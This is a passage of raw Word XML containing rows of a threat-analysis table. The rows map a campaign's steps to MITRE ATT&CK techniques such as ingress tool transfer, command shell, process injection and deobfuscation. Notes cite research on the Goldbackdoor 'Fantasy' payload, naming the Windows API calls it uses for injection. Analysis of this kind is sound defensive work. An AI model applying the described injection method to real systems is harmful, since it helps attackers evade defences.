                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A8E1A71" w14:textId="3F7BC32B" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00485C4E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="189942D6" w14:textId="77777777" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00485C4E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AA5C0CB" w14:textId="09FB1AAC" w:rsidR="00485C4E" w:rsidRDefault="00485C4E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53E1F64D" w14:textId="0867BD46" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB2B78D" w14:textId="6AC23ACA" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00485C4E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B9179C" w:rsidRPr="00DD46F5" w14:paraId="16F73BEB" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EBC2423" w14:textId="2FEAD5C5" w:rsidR="008A084E" w:rsidRPr="00DD46F5" w:rsidRDefault="008A084E" w:rsidP="008A084E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C32FD9" w14:textId="70E940A8" w:rsidR="008A084E" w:rsidRPr="00DD46F5" w:rsidRDefault="008A084E" w:rsidP="008A084E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450F8F91" w14:textId="7652E5DA" w:rsidR="008A084E" w:rsidRPr="00DD46F5" w:rsidRDefault="00DD46F5" w:rsidP="008A084E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="010391B6" w14:textId="0B395589" w:rsidR="008A084E" w:rsidRPr="00DD46F5" w:rsidRDefault="00DD46F5" w:rsidP="008A084E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F9930A" w14:textId="77777777" w:rsidR="008A084E" w:rsidRPr="00DD46F5" w:rsidRDefault="008A084E" w:rsidP="008A084E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="018AA8A6" w14:textId="5F1000D4" w:rsidR="008A084E" w:rsidRPr="00DD46F5" w:rsidRDefault="008A084E" w:rsidP="008A084E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F74A841" w14:textId="4422D6A8" w:rsidR="008A084E" w:rsidRPr="00DD46F5" w:rsidRDefault="00EC2E4B" w:rsidP="008A084E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79679CCC" w14:textId="0D0E3846" w:rsidR="008A084E" w:rsidRPr="00DD46F5" w:rsidRDefault="008A084E" w:rsidP="008A084E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD46F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD59F3" w:rsidRPr="00B9179C" w14:paraId="48EC0995" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AA257C3" w14:textId="1C03ABAF" w:rsidR="00AD59F3" w:rsidRPr="002F01CE" w:rsidRDefault="002F01CE" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="010D9615" w14:textId="626BBD40" w:rsidR="00AD59F3" w:rsidRPr="002F01CE" w:rsidRDefault="002F01CE" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">TA0005: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014346A0" w14:textId="4891E7FC" w:rsidR="00AD59F3" w:rsidRPr="002F01CE" w:rsidRDefault="00AD59F3" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1055 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF914F0" w14:textId="0AEBCF62" w:rsidR="00AD59F3" w:rsidRPr="002F01CE" w:rsidRDefault="00AD59F3" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AA4EBA0" w14:textId="77777777" w:rsidR="00AD59F3" w:rsidRPr="002F01CE" w:rsidRDefault="00AD59F3" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33F03FAD" w14:textId="137F8D63" w:rsidR="00AD59F3" w:rsidRPr="002F01CE" w:rsidRDefault="00AD59F3" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22C79575" w14:textId="4C299B60" w:rsidR="00AD59F3" w:rsidRPr="002F01CE" w:rsidRDefault="00EC2E4B" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DBD7987" w14:textId="6035DE48" w:rsidR="00AD59F3" w:rsidRPr="00AD59F3" w:rsidRDefault="00AD59F3" w:rsidP="008C2E9A">
            <w:r>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="00C97663">
              <w:t xml:space="preserve">This payload is called “Fantasy,” and according to Stairwell, it’s the first of the two deploying mechanisms of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C97663">
              <w:t>Goldbackdoor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C97663">
              <w:t>, both relying on stealthy process injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005317DB" w:rsidRPr="00B9179C" w14:paraId="0D3E4F10" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="225307C0" w14:textId="33059019" w:rsidR="005317DB" w:rsidRDefault="00EA008E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="665D220C" w14:textId="32B39FDF" w:rsidR="005317DB" w:rsidRPr="009E4622" w:rsidRDefault="00EA008E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009E4622">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93" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DF00346" w14:textId="1F0A3D40" w:rsidR="005317DB" w:rsidRPr="00B9179C" w:rsidRDefault="00EA008E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BBA50E6" w14:textId="28404280" w:rsidR="005317DB" w:rsidRDefault="00EA008E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55BE516F" w14:textId="77777777" w:rsidR="005317DB" w:rsidRPr="00B9179C" w:rsidRDefault="005317DB" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0146ECEA" w14:textId="55DF5F04" w:rsidR="005317DB" w:rsidRDefault="00EA008E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18FB7B77" w14:textId="733A8185" w:rsidR="005317DB" w:rsidRPr="00B9179C" w:rsidRDefault="00EC2E4B" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02BC4F64" w14:textId="59DC5005" w:rsidR="005317DB" w:rsidRPr="00EA008E" w:rsidRDefault="00EA008E" w:rsidP="008C2E9A">
            <w:r>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="005317DB">
              <w:t xml:space="preserve">Fantasy parses and decodes the payload and uses a standard process involving </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005317DB">
              <w:lastRenderedPageBreak/>
              <w:t>VirtualAllocEx,WriteProcessMemory</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005317DB">
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005317DB">
              <w:t>RtlCreateUserThread</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005317DB">
              <w:t xml:space="preserve"> to spawn a thread under the previously created process in order to execute it, researchers said.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA008E" w:rsidRPr="00B9179C" w14:paraId="6B7DDB49" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3106F79C" w14:textId="32969503" w:rsidR="00EA008E" w:rsidRPr="002F01CE" w:rsidRDefault="00EA008E" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7355F59F" w14:textId="77777777" w:rsidR="00EA008E" w:rsidRPr="002F01CE" w:rsidRDefault="00EA008E" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">TA0005: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43BCC411" w14:textId="77777777" w:rsidR="00EA008E" w:rsidRPr="002F01CE" w:rsidRDefault="00EA008E" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1055 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
